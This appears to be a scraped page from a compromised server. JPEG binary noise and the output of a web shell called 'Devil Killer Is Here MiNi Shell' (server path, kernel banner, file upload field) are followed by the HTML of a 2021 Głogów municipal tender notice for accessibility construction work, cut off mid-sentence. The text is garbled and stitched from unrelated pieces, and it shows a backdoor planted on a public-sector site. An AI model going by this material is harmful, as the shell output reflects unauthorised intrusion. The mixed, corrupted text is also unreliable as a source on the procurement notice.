JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210816/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210816/0014997001-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie robót budowlanych poprawiających dostępność budynku MORiUS w Głogowie dla osób niepełnosprawnych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miejska Głogów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 390647297</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Głogów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">67-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL516 - Legnicko-głogowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">76 72 65 527</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">bzp@glogow.um.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.glogow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie robót budowlanych poprawiających dostępność budynku MORiUS w Głogowie dla osób niepełnosprawnych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-81bc7c91-fe7e-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00149970</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003361/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.21 Wykonanie robót budowlanych poprawiających dostępność budynku MORiUS w Głogowie dla osób niepełnosprawnych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://glogow-um.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://glogow-um.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">2.wymagania techniczne i organizacyjne sporządzania, wysyłania i odbierania korespondencji<br/>elektronicznej:1)zgłoszenie do postępowania wymaga zalogowania wykonawcy do systemu<br/>https://glogow-um.ezamawiajacy.pl , www.glogow.bip.info.pl. (przez Biuletyn Informacji Publicznej<br/>zakładka „Zamówienia publiczne”, Platforma zakupowa MarketPlanet); 2) wykonawca po wybraniu<br/>opcji „Przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl,<br/>gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta.<br/>Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia<br/>hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie<br/>„zarejestruj się”;3) rejestracja wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym<br/>zamawiający zaleca wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie<br/>złożenia oferty w postaci elektronicznej; wykonawca wraz z potwierdzeniem złożenia wniosku<br/>rejestracyjnego otrzyma informację, o możliwości przyspieszenia procedury założenia konta, wówczas<br/>należy skontaktować się pod numerem telefonu podanym w ww. potwierdzeniu; 4)po założeniu konta<br/>wykonawca ma możliwość złożenia oferty w postępowaniu; komunikacja między zamawiającym a<br/>wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są w formie<br/>elektronicznej za pośrednictwem platformy zakupowej; za datę przekazania zaświadczeń oraz<br/>informacji przyjmuje się datę ich wysłania za pośrednictwem zakładki „korespondencja”;5)wykonawca<br/>może zwrócić się do zamawiającego o wyjaśnienie treści SWZ. Wniosek należy przesłać za<br/>pośrednictwem platformy zakupowej przez opcję „zadaj pytanie” lub przy użyciu zakładki<br/>„korespondencja”. W celu zadania pytania zamawiającemu, wykonawca klika lewym przyciskiem<br/>myszy klawisz ZADAJ PYTANIE; powoduje to otwarcie okna, w którym należy uzupełnić dane<br/>Wykonawcy, temat i treść/przedmiot pytania, po wypełnieniu wskazanych pól wraz z wymaganym<br/>kodem weryfikującym z obrazka, klika klawisz POTWIERDŹ. Wykonawca uzyskuje potwierdzenie<br/>wysłania pytania poprzez komunikat systemowy "pytanie wysłane".6)Zamawiający informuje, iż w<br/>przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy, Wykonawca winien skontaktować się z dostawcą rozwiązania teleinformatycznego Platforma zakupowa Głogów tel.<br/>+48 22 2572224 (infolinia dostępna w dni robocze, w godzinach 9.00-17.00) e-mail:<br/>oneplace@marketplanet.pl;7)Zamawiający zgodnie z § 2 rozporządzenia Prezesa Rady Ministrów z<br/>dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. poz. 2452), określa<br/>dopuszczalny format podpisu elektronicznego, jako:- dokumenty w formacie „pdf" - zaleca się<br/>podpisywać formatem PAdES,- dopuszcza się podpisanie dokumentów w formacie innym niż „pdf",<br/>wtedy będzie wymagany oddzielny plik z podpisem. W związku z tym Wykonawca będzie zobowiązany<br/>załączyć, prócz podpisanego dokumentu, oddzielny plik z podpisem.3.niezbędne wymagania<br/>sprzętowo- aplikacyjne umożliwiające pracę na platformie zakupowej tj.:1)stały dostęp do sieci Internet<br/>o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;2)komputer klasy PC lub MAC, o<br/>następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów<br/>operacyjnych - MS Windows 7, Mac Os x 10.4, Linux, lub ich nowsze wersje;3)zainstalowana dowolna<br/>przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet<br/>Explorer minimalnie wersja 10.0;4)włączona obsługa JavaScript;5)zainstalowany program Acrobat<br/>Reader lub inny obsługujący pliki w formacie .pdf.4.dopuszczalne formaty przesyłanych danych: pliki o<br/>wielkości do 100 MB w txt, zgodnie z SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>􀀀 administratorem Pani/Pana danych osobowych jest Prezydent Miasta Głogowa z siedzibą w<br/>Urzędzie Miejskim w Głogowie Rynek 10, 67-200 Głogów, adres e-mail: prezydent@glogow.um.gov.pl,<br/>tel. +48 76 7265 401;<br/>􀀀 W Urzędzie Miejskim w Głogowie został wyznaczony inspektor ochrony danych osobowych tel. +48<br/>76 72 65 471, e-mail: iod@glogow.um.gov.pl;<br/>Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym<br/>z postępowaniem o udzielenie zamówienia publicznego Nr BZP.271.31.2021 w trybie podstawowym ;<br/>􀀀 odbiorcami Pani/Pana danych osobowych będą:<br/>o osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18<br/>oraz art. 74 ust. 1 ustawy z dnia z dnia 11 września 2019 r. Prawo zamówień publicznych (t. j. Dz. U. z<br/>2021 r. poz. 1129), dalej „ustawa Pzp”;<br/>o osoby upoważnione przez Zamawiającego Gminę Miejską Głogów, które muszą mieć dostęp do<br/>danych,<br/>o podmioty uprawnione do uzyskania danych osobowych (np. Instytucja Zarządzająca, Instytucja<br/>Wdrażająca)<br/>o podmioty, które przetwarzają Pani/ Pana dane osobowe w imieniu Zamawiającego na podstawie<br/>zawartej umowy powierzenia przetwarzania danych osobowych (tzw. podmioty przetwarzające) jak i<br/>dostawcy usług wspierających działania Zamawiającego:<br/>􀀀 Otwarty Rynek Elektroniczny S.A. ul .Domaniewska 49, 02-672 Warszawa – podmiot udostępniający<br/>Platformę e-Zamawiający,<br/>o organy administracji publicznej (jeżeli wynika to z przepisu prawa, decyzji administracyjnej lub<br/>orzeczenia sądowego);<br/>􀀀 Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowyprzekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>􀀀 obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/>􀀀 w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>􀀀 posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6<br/>ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BZP.271.35.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonanie izolacji pionowej przeciwwodnej i termicznej części podziemnej wraz z odtworzeniem<br/>pierwotnych chodników, opasek i remontu nawierzchni oraz remont i rozbudowa placu przed<br/>budynkiem w ramach realizacji zadania pn. „Wykonanie robót budowlanych poprawiających<br/>dostępność budynku MORiUS w Głogowie dla osób niepełnosprawnych”.<br/>który obejmuje w szczególności:<br/>1 - Prace rozbiórkowe<br/>- demontaż części ogrodzenia<br/>- rozbiórka rampy dla osób niepełnosprawnych<br/>- rozbiórka placu manewrowego przed budynkiem wraz z krawężnikami<br/>- prace rozbiórkowe związane z odkryciem fundamentów:<br/>- zbicie części tynków ścian fundamentowych,<br/>- demontaż stolarki okiennej w pomieszczeniach piwnicznych,<br/>- rozbiórka ścian wsporczych dwóch ramp położonych od strony południowej budynku<br/>- demontaż skorodowanych pionowych i poziomych odcinków zewnętrznych instalacjibiegnących wzdłuż budynku<br/>2 - Prace budowlane<br/>- Odtworzenie nowego ogrodzenia w miejscu rozebranej bramy wjazdowej o długości<br/>ok. 3,8 mb<br/>- wykonanie dwóch nowych zjazdów drogowych o pow. ok. 47 m2<br/>- wykonanie nowych nawierzchni z kostki betonowej ok 624 m2<br/>- kostka betonowa szara (część kostki z dystansami gr 8 cm)<br/>- podsypka z miału kamiennego gr 7cm<br/>- kruszywo łamane stabilizowane mechanicznie 20 cm<br/>- warstwa odsączająca piasku 15 cm<br/>- zagęszczenie gruntu<br/>- wykonanie izolacji przeciw wodnej ścian fundamentowych i izolacji termicznej<br/>- montaż nowej stolarki okiennej w ilości ok. 8,1 m2<br/>- zasypanie ścian fundamentowych i wykonanie opaski wokół budynków<br/>- montaż platformy dla osób niepełnosprawnych wraz z jej zadaszeniem lekką konstrukcją<br/>aluminiową krytą daszkiem z pleksy<br/>- TYP urządzenia:<br/>- Udźwig: 340 kg<br/>- prędkość jazdy: 0,06m/s<br/>- rodzaj napędu: napęd śrubowy z nakrętką bezpieczeństwa<br/>- napięcie zasilania: 1 fazowe 240VAC ,50Hz<br/>- zabezpieczenia zasilania: 16 A<br/>- napięcie sterowania 24 VDC<br/>- moc silnika 0,95 kW<br/>- wysokość podnoszenia: 1,60 m<br/>- ilośćprzystanków -2<br/>- powierzchnia platformy: 900 x 1400<br/>- usytuowanie wejść na platformę: naprzeciw siebie – przejazd na wprost<br/>- wysokość ścianek bocznych: 1100mm<br/>- rodzaj drzwi: wychylne, jednoskrzydłowe, otwierane ręcznie<br/>- drzwi na platformie górnego przystanku: 902 x 1100<br/>- wykonanie dwóch nowych podjazdów dla osób niepełnosprawnych od strony południowej<br/>budynku wraz z budową nowych ścian wsporczych i barierkami<br/>- wykonanie nowych naświetleń okien piwnicznych – 10 szt.<br/>Zadanie dofinansowane ze środków Funduszu Przeciwdziałania COVID-19 dla jednostek<br/>samorządu terytorialnego (Rządowy Fundusz Inwestycji Lokalnych).<br/>Szczegółowy opis i zakres wykonania przedmiotu zamówienia zawiera dokumentacja<br/>projektowa, w skład której wchodzą projekt budowlano-wykonawczy, Specyfikacja Techniczna<br/>Wykonania i Odbioru Robót budowlanych (dalej STWiORB) oraz przedmiar robót, które są<br/>załącznikami do niniejszej SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233140-2 - Roboty drogowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">80 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielanie zamówień, o których mowa w art. 214 ust. 1 pkt. 7.<br/>do wysokości 50 % wartości zamówienia podstawowego. Przewiduje się możliwość wykorzystania<br/>wszystkich rodzajów prac określonych w dokumentacji.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">punktowo</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu, dotyczące:<br/>1) sytuacji ekonomicznej i finansowej;<br/>a) posiadają środki finansowe lub zdolność kredytową w wysokości co najmniej 300.000,00 zł<br/>(słownie: trzysta tysięcy złotych): co potwierdzą poprzez złożenie aktualnej informacji banku,<br/>b) posiadają ubezpieczenie od OC z tytułu prowadzonej działalności gospodarczej związanej z<br/>przedmiotem zamówienia, na kwotę co najmniej 500.000,00 zł (słownie: pięćset tysięcy złotych).<br/>2) zdolności technicznej lub zawodowej, tj.<br/>a) posiadają doświadczenie umożliwiające realizację zamówienia tzn. w okresie ostatnich pięciu<br/>lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -<br/>w tym okresie, wykonali należycie co najmniej: jedną robotę budowlaną polegającą na<br/>budowie/przebudowie/rozbudowie/remoncie obiektu użyteczności publicznej o kubaturze nie<br/>mniejszej niż 1.000 m3 wraz z budową/przebudową/remontem instalacji elektrycznych oraz<br/>jedną robotę budowlaną polegającą na budowie/przebudowie/rozbudowie/remoncie<br/>drogi/parkingu/chodnika/nawierzchni utwardzonej z kostki kamiennej/brukowej o powierzchni nie<br/>mniejszej niż 500 m2<br/>co potwierdzą w wykazie wykonanych robót i referencjami;<br/>b) dysponują lub będą dysponować :- kierownikiem budowy (1 osoba) posiadającym uprawnienia budowlane do kierowania robotamibudowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń lub odpowiadające im<br/>równoważne uprawnienia budowlane oraz co najmniej 2 letnie doświadczenie w kierowaniu<br/>budową w zakresie robót konstrukcyjno-budowlanych<br/>- kierownikiem robót elektrycznych i elektroenergetycznych (1 osoba) posiadającym uprawnienia<br/>budowlane do kierowania robotami instalacyjnymi w specjalności sieci, instalacji i urządzeń<br/>elektrycznych i elektroenergetycznych, bądź też odpowiadające im uprawnienia budowlane<br/>wydane na podstawie wcześniej obowiązujących przepisów umożliwiające wykonywanie funkcji<br/>kierownika dla budowy będącej przedmiotem zamówienia oraz co najmniej 2 letnie<br/>doświadczenie w kierowaniu budową w zakresie robót elektrycznych; <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, wystawionych nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,<br/>b) oświadczenia o braku przynależności do grupy kapitałowej ( wg załącznika Nr 3 do SWZ).<br/>Zamawiający żąda od wykonawcy, który na potwierdzenie spełniania warunków udziału w<br/>postępowaniu, polega na zdolnościach lub sytuacji innych podmiotów, przedstawienia w odniesieniu do<br/>tych podmiotów dokumentów wymienionych w pkt. 1 ppkt. 1 lit. a) i b).<br/>c) oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu , o którym mowa w<br/>art.125 ustawy Prawo zamówień publicznych ( wzór stanowi załącznik Nr 8 do SWZ ).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) wykazu robót budowlanych wykonanych nie wcześniej niż w okresie<br/>ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem<br/>ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały<br/>wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane<br/>należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone<br/>przez podmiot, na 